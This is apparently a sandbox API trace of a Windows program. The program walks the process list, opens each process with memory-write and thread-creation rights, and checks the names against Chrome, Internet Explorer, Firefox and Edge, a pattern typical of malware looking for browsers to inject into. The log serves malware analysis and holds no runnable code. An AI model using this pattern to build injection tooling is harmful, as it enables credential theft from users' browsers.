	[0208.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.614] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.614] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0208.615] CloseHandle (hObject=0x188) returned 1
	[0208.615] Sleep (dwMilliseconds=0x64) 
	[0208.839] GetCurrentProcessId () returned 0x110
	[0208.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0208.847] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0208.848] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0208.850] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0208.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3260
	[0208.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.852] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0208.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.852] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.853] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0208.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.871] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.875] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0208.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3264
	[0208.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.876] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0208.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.876] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.876] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0208.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.876] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.877] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0208.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3268
	[0208.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.877] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0208.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.878] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.878] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0208.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.879] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.879] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0208.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x326c
	[0208.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.880] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0208.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.880] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.880] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0208.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.881] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.881] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0208.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3270
	[0208.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.882] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0208.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.882] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.882] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0208.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.883] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.883] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0208.884] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3274
	[0208.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.884] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0208.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.884] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.885] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0208.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.885] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.885] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0208.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3278
	[0208.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.886] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0208.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.887] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.887] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0208.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.887] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.887] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0208.888] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x327c
	[0208.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.888] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0208.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.888] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.889] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0208.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.889] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.889] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3280
	[0208.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.890] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.890] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.891] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.891] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.891] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.892] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3284
	[0208.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.892] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.893] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.893] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.893] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.893] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.894] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3288
	[0208.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.894] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.895] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.895] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.895] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.895] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x328c
	[0208.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.896] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.897] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.897] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.897] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.897] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3290
	[0208.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.898] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.899] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.899] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.899] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.899] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3294
	[0208.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.901] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.901] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.902] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.902] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.902] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.903] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3298
	[0208.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.903] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.903] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.904] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.904] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.904] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0208.905] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x329c
	[0208.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.905] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0208.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.905] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.906] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0208.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.906] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.906] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x32a0
	[0208.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.907] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.907] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.908] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.908] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0208.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x32a4
	[0208.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.909] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.909] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.910] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.910] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.910] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0208.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x32a8
	[0208.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.911] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0208.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.911] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.912] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0208.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.912] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.912] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0208.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x32ac
	[0208.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.913] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0208.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.913] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.914] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0208.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.914] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.914] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0208.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x32b0
	[0208.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.915] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0208.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.915] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.916] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0208.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.916] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.916] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0208.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x32b4
	[0208.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.917] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0208.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.917] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.918] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0208.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.918] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.918] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0208.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x32b8
	[0208.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.919] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0208.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.919] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.919] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0208.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.920] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0208.920] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0208.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x32bc
	[0208.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.921] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0208.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.921] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0208.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.921] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
